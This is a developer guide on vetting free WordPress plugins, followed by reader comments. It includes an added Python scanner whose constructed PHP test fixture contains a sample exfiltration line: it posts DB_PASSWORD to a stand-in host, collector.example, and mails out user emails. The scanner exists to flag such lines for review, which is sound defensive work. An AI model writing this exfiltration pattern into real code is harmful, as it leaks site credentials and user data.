A Developer’s Guide to Using Free WordPress Plugins

By Rakhitha Nimesh

WordPress, the most popular content management system in the world, is built on a structure that allows users to supplement core functionality with themes that provide visual designs and plugins that provide specific additional functionality.

There are now over 20,000 plugins in the official WordPress repository, all of them free to use. Anyone can upload a plugin, and if it is good it is likely to become very popular. This does, however, carry some risks. What if the plugin is poorly coded and breaks down? What if it’s incompatible with other plugins, the theme being used, or even core functionality? What if – heaven forbid – it has been deliberately set up to place malicious code on your website?

Should Developers Use Free Plugins?

The answer to this question depends upon your personal preference and the status of your project. Personally, I prefer to write my own plugins whenever possible. In real life, that isn’t always possible: client requirements, deadlines, capabilities of other team members etc. might not allow for that. In such situations, developers understandably consider whether a free plugin can provide the required functionality.

It can be easier, faster and more cost-effective for even an experienced developer to use a freely available plugin. There is nothing wrong with this, but the developer needs to be aware that there are some considerations that should be taken into account. Once you decide to work with free plugins, you have to consider various factors in choosing the right plugin in order to prevent unexpected behaviour.

Basics for Choosing WordPress Plugins

There is a group of factors that apply to anyone considering using a free WordPress plugin, whether they are site owners, amateur designers or professional developers.

Versions and Compatibility


Version details are placed at the top right corner of every WordPress plugin detail page. Check that you are using the latest version of the plugin and that it is compatible with the version of WordPress you are using. If a plugin has been updated recently, it’s an indicator that the author is keeping up with compatibility requirements.

Downloads, Ratings and Reviews


A high number of downloads and good user ratings indicate that users are not having problems using this plugin. Also make sure to check the reviews section to find out why users like this plugin and what difficulties they may have found in using this plugin.

Documentation and Support


Plugins may be created and distributed by large development agencies or a solo operator who had a good idea. Either way, the end user and you as the developer should look for clear, accurate and up-to-date documentation as well as a means of obtaining support from the plugin developer and/or the community of people who use the plugin. A larger agency may have a website that provides a knowledge base, a Frequently Asked Questions page, a ticketing system and/or a forum where users can crowdsource solutions to problems.

Smaller or solo plugin developers may provide a blog that covers much the same set of purposes, preferably including a way of contacting the plugin author directly.

A nontechnical user such as an amateur setting up their own website may consider it worth taking the risk of using a plugin that does not have adequate documentation and support. A professional developer working for a client never should: the consequences could be disastrous for your reputation.

The Developer’s Perspective

The factors mentioned in the previous section apply to anyone considering using a free WordPress plugin. However, developers come equipped with skills and information not available to the everyday mortal and they thus carry a greater level of responsibility to check things ordinary users may not even know about.

Test in a Non-Crucial Environment

Never test new plugins in your production environment or any other WordPress installation that is important to you. Instead, try keeping a separate WordPress installation for testing purposes with the default themes and default plugins.

Keep your test environment tidy, so you don’t end up with lots of unused plugins that may conflict with each other. Make your testing environment mimic your production environment as closely as possible. Activate the chosen plugin, test it properly and then remove it before testing the next plugin.

Given that everything works as expected, it’s time to dig into the code and see whether the chosen plugin is suitable to use in your actual applications.

Function and Class Naming Conventions

Anyone can upload a plugin to the WordPress plugin repository as long as it meets the basic plugin submission guidelines. That creates the chance that two or more plugin developers have used the same function and class names, resulting in conflicts at runtime.

Such conflicts can be avoided by prefixing plugin functions and classes with a plugin-related keyword. As a user of such plugins, you should check the function names to make sure they are unique, at least within your application.

Consider the following function declarations.

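Not Recommended

function get_key() { /* generic name: can collide with another plugin */ }

Recommended

function akismet_get_key() { /* prefixed with the plugin name */ }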

There is no guarantee that prefixing will completely prevent conflicts, but using unique prefixes definitely reduces the chances of having duplicate functions.

Plugin Specific Tables

WordPress is flexible enough to create a wide range of web applications using its default table structure. But sometimes we need additional custom tables to provide plugin specific functionalities.

These custom tables are generally created on activation of the plugin. Most developers won’t remove these custom tables on plugin deactivation. Therefore, whenever you decide to get rid of an existing plugin, you have to remove the tables from the database manually to prevent unnecessary growth of the database.

Custom table names should also be built from the table prefix defined in the config file rather than hard-coded. Consider the following code for proper table naming conventions.

Not Recommended

$portfolios = $wpdb->get_results( "SELECT * FROM wp_portfolio" );

Recommended

$portfolios = $wpdb->get_results( "SELECT * FROM " . $wpdb->prefix . "portfolio" );

Custom SQL queries are needed to access these tables since WordPress does not provide built-in methods for them. The WordPress functions used to access data from the default tables are optimized for performance, so with custom tables you might see a slight performance decrease because their queries are not optimized in the same way.

Check whether your plugin uses custom tables and make sure to consider the above guidelines when choosing a plugin.

Security and Spamming

Security is a big concern in using free plugins. We don’t know the quality of the code or exactly what the developers are doing inside it. Therefore it’s important to check whether a plugin contains security holes or spam content.

  • First we need to look for data validation. If user input is not properly validated and sanitized, anyone will be able to enter data that damages our sites.
  • Then we need to check whether a plugin accesses sensitive data like configuration details and user details, and whether it sends them to third party applications.
  • Also we need to check whether a plugin sends emails to unknown email addresses with data from your database or files.
  • Some developers insert spam content such as the developer's social profile links, websites, affiliate ads and other links into the plugin-generated output. Make sure to remove such things from the code or avoid using such plugins.

These are only a few of the security concerns that a plugin may have in its code. When you find something malicious in a plugin's code, make sure to share it with the community to prevent other users from using that plugin.
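A first-pass scan for the four checks listed above, as an added example that is not part of the original article: it only flags lines for manual reading and proves nothing on its own. The `review` function, the pattern lists and the PHP sample are constructed for illustration.

```python
import re

# Calls that usually mean the value was cleaned before use (heuristic, same line only).
SANITIZERS = ("sanitize_", "esc_", "intval", "absint", "wp_kses")
SUPERGLOBAL_RE = re.compile(r'\$_(?:GET|POST|REQUEST|COOKIE)\b')
OUTBOUND_RE = re.compile(r'\b(?:wp_remote_(?:get|post|request)|curl_exec|fsockopen)\s*\(')
MAIL_RE = re.compile(r'\b(?:wp_mail|mail)\s*\(')
SENSITIVE_RE = re.compile(r'\b(?:DB_PASSWORD|DB_USER|DB_NAME|AUTH_KEY|user_pass|user_email)\b')
LINK_RE = re.compile(r'echo\b.*<a\s[^>]*href=', re.I)

def review(source):
    """Return (line_no, label) pairs for lines a reviewer should read by hand."""
    hits = []
    for no, line in enumerate(source.splitlines(), 1):
        if SUPERGLOBAL_RE.search(line) and not any(s in line for s in SANITIZERS):
            hits.append((no, "unsanitized input"))
        if OUTBOUND_RE.search(line):
            hits.append((no, "outbound request"))
        if MAIL_RE.search(line):
            hits.append((no, "sends email"))
        if SENSITIVE_RE.search(line):
            hits.append((no, "touches sensitive data"))
        if LINK_RE.search(line):
            hits.append((no, "hard-coded link in output"))
    return hits

# Constructed plugin source used as a test fixture; not taken from any real plugin.
SAMPLE = r'''<?php
$title = $_POST['title'];
$clean = sanitize_text_field( $_POST['title'] );
$body  = array( 'site' => home_url(), 'pw' => DB_PASSWORD );
wp_remote_post( 'https://collector.example/in', array( 'body' => $body ) );
wp_mail( 'someone@example.com', 'dump', $wpdb->get_var( "SELECT user_email FROM {$wpdb->users}" ) );
echo '<a href="https://ads.example/">Plugin by Example Dev</a>';
'''

if __name__ == "__main__":
    for no, label in review(SAMPLE):
        print(f"line {no}: {label}")
```

Outbound requests and email are normal in many legitimate plugins, so each hit is a prompt to read the surrounding code and see what data is sent and where.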

Plugin Specific Options

WordPress plugin developers use options to retain settings and other important information related to plugins. These options are stored in the default wp_options table.

Plugins that use the same keys for their options are hard to manage without conflicts, similar to the issue with function and class names. It’s worse in this scenario, since two duplicate option keys may conflict without generating any visible error. It can be extremely difficult to figure out the exact issue.

Consider the following code for creating plugin options.

Not Recommended

update_option( 'xml', $opt );

update_option( 'social', $opt );

Recommended

update_option( 'wpseo_xml', $opt );

update_option( 'wpseo_social', $opt );

Unfortunately, the only solution I know of to this problem is to manually check whether a plugin uses prefixes for its option keys.
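The manual prefix check can be partly scripted. This added example (not from the original article) lists global functions, classes and option keys that lack an expected prefix, plus hard-coded wp_ table names, covering the naming, table and option sections above; the `audit_prefix` name, the column-0 heuristic for global functions and the sample plugin source are assumptions.

```python
import re

# Heuristic: a "function" keyword at column 0 is a global function; methods are indented.
FUNC_RE = re.compile(r'^function\s+&?\s*([A-Za-z_]\w*)\s*\(', re.M)
CLASS_RE = re.compile(r'^\s*(?:abstract\s+|final\s+)?class\s+([A-Za-z_]\w*)', re.M)
OPTION_RE = re.compile(r'\b(?:add|update|get|delete)_option\s*\(\s*[\'"]([^\'"]+)[\'"]')
# A literal wp_ table name right after an SQL keyword bypasses $wpdb->prefix.
TABLE_RE = re.compile(r'\b(?:FROM|INTO|UPDATE|JOIN|TABLE)\s+`?(wp_\w+)', re.I)

def audit_prefix(source, prefix):
    """Return sorted (kind, name) pairs that could collide with other plugins."""
    findings = set()
    checks = (("function", FUNC_RE), ("class", CLASS_RE), ("option", OPTION_RE))
    for kind, rx in checks:
        for name in rx.findall(source):
            # PHP function and class names are case-insensitive, so compare lowercased.
            if not name.lower().startswith(prefix.lower()):
                findings.add((kind, name))
    for table in TABLE_RE.findall(source):
        findings.add(("hardcoded table", table))
    return sorted(findings)

# Constructed plugin source used as a test fixture; not taken from any real plugin.
SAMPLE = r'''<?php
function get_key() { return get_option( 'xml' ); }
function wpseo_get_key() { return get_option( 'wpseo_xml' ); }
class Portfolio {}
class WPSEO_Portfolio {
    function load() {
        global $wpdb;
        return $wpdb->get_results( "SELECT * FROM wp_portfolio" );
    }
    function load_ok() {
        global $wpdb;
        return $wpdb->get_results( "SELECT * FROM " . $wpdb->prefix . "portfolio" );
    }
}
update_option( 'social', $opt );
update_option( 'wpseo_social', $opt );
'''

if __name__ == "__main__":
    for kind, name in audit_prefix(SAMPLE, "wpseo_"):
        print(f"{kind}: {name}")
```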

Direct Loading of CSS and JavaScript

Inexperienced WordPress developers tend to load their CSS and JavaScript files directly inside the plugin. That can cause problems.

  • Duplicate CSS and JavaScript files
  • Increased page loading time and possibility of breaking the code.
  • Includes files everywhere inside the page

On the other hand, experienced developers hook into the wp_enqueue_scripts action to load the files. WordPress then checks whether a library is already loaded and whether it has any dependencies before including it in the page, preventing duplicates.

Consider the following code for including scripts and styles.

Not Recommended

function include_scripts_styles() {
    // Prints the tags directly, bypassing WordPress' duplicate and dependency checks.
    echo '<script type="text/javascript" src="jquery.js"></script>';
    echo '<link type="text/css" rel="stylesheet" href="styles.css" />';
}

Recommended

add_action('wp_enqueue_scripts', 'wppc_scripts');
function wppc_scripts() {
    // Register the stylesheet under a handle, then enqueue it so it is loaded once.
    wp_register_style('sample_style', plugins_url('styles.css', __FILE__));
    wp_enqueue_style('sample_style');
}

So, you should prefer plugins that load their scripts and styles in this organized way, to prevent maintenance issues.


Everything included in this article is based on my own experiences with WordPress development. I’m not aware of anyone, from committed amateur to experienced professional, who has the required experience of every available plugin and how they will operate in every possible production environment. That’s probably not even possible.

What is possible is to draw upon your professional knowledge of how code works to give yourself and your client the best possible chance to avoid issues with free WordPress plugins. There is an added responsibility to share your knowledge with others. If you detect an issue that may affect how others make use of a plugin, let the world know. Probably the best way is through the avenues provided by the plugin developer, but you should also consider just contacting the plugin author and letting them know what you found out.

I invite WordPress developers to join this conversation and include their personal experiences in using free plugins. What are your personal pros and cons? Have you worked out your own procedural guidelines and safety practices? Do you have rules about plugins you will or won’t use?

I look forward to your comments and suggestions.

  • Although plugins might not always work exactly the way you want them, many of them are very powerful and reliable and save you weeks if not months developing something similar. I think it’s usually best to test the plugins internally before pushing live or thinking about creating your own. It also gives you a better idea of what you would do the same or differently yourself.

    • Hello

      You are absolutely right. It saves us lots of time. But writing our own plugins gives us more control. I develop plugins when I have long term plans of using them in all the projects.

      So do you look inside the code when choosing free plugins? If you do, what would be the first thing you are going to look for?

      Let me know.

      Thank you very much.

  • Hi, pretty good article here, thanx for starting up the conversation again. I would comment that your recommended method for plugin options should go one step further and in fact place your options into an array. Both themes and plugins often store many dozens of options each, they all need to be placed into a single array to reduce the need to connect with the database. One call to get and one to set all of your plugin options.

    • Hello Daiv

      Thank you very much for your suggestions and interest in my article.

      Good point you made with plugin options. We should definitely insert common options into an array and save it as a single entry in the options table without using a single record for every option.

      In the example I have used the options of the WP SEO plugin, which uses the same technique. XML details are inserted into a single option with an array of values and another array of values for Social details, making it easy to use.

      I would like to ask what things you might like to look for in plugin code before actually using it?

      Let me know.

  • OK, right off the bat, I don’t write plugin code. I do use WP themes and make it a habit to not use special home made plugins because you just don’t know what changes are going to be made from year to year. Yes, some of the plugins have been bought out or dropped off the face of the earth, but in most cases if you choose professional plugins (like Gravity Forms) and themes (like Genesis) you don’t have to worry so much about support or having to change your preferences in the next several years.

    I’ve been asked to help on several sites that are stuck on an old version of WP because they can’t update their special plugin or theme. The company can’t find the designer or doesn’t have the same relationship with the designer.

    I think my concerns are more about using a theme or plugin that won’t be supported in the future.

    • Hello Jack

      Thank you very much for the suggestions.

      I agree with you regarding everything you said. It’s about choosing the right plugins. Using top plugins in the WP directory is not a problem since they have an active community and will continue to develop in the future.

      Considerations need to be made when you try to use a new plugin which has not much information about its future or the developer.

      Do you look inside plugin code before choosing plugins? And have you ever found plugins which generate spam content or potential security threats?

      Like to hear from you.

  • Nice point there. But since I am a newbie to programming (PHP) I don’t have any option than to succumb to plugins. Though off topic, please help with resources on how I can learn PHP.

    • You should stop by PHPMaster. While many of the folks there are advanced in their knowledge, they’re also pretty friendly and could point you in the right direction.

    • Hi collizo4sky

      Thank you very much for taking time to comment.

      As Ricky suggested, PHPMaster is the best resource for learning PHP. I also write there. So I definitely know that the writers and developers of PHPMaster will guide you through the process of learning PHP.

  • PHPMaster seems good. But my problem with it is, it contains random PHP tutorials. Since I am a newbie (though I know basic PHP syntax and coding) and willing to learn, sir Nimesh, I would like you to help me with some good website or resources where I could start. If possible, can you tell me how you became a PRO, and how you learnt it? Please.

    • Hi

      I understand your problem. You need to have basic knowledge of PHP to understand the tutorials in PHPMaster. I personally started with the w3schools tutorial for learning the basics of PHP. Then I started developing small web sites with PHP. I believe practically doing something is better than learning theories.

      Once you get the basic knowledge, I suggest you look for basic practical tutorials which build something. There are plenty of such tutorials. I don’t consider myself a PRO yet. There are lots of things to learn.

      Let me know if it helps and if you need further guidance.

  • I have used free plugins, however, I have had some pretty bad experiences with some of them crashing during a WordPress update, and then on top of it, finding out there has been no updates or support for the plugin usually leaves me scrambling to find a replacement.

    Keep free plugins to a minimum if you can and ensure they are supported. Great info, Thanks!

    • Hello Jeff

      Thank you very much for the interest in my article and taking time to provide your own experiences.

      It’s always better to keep only the necessary plugins to avoid conflicts.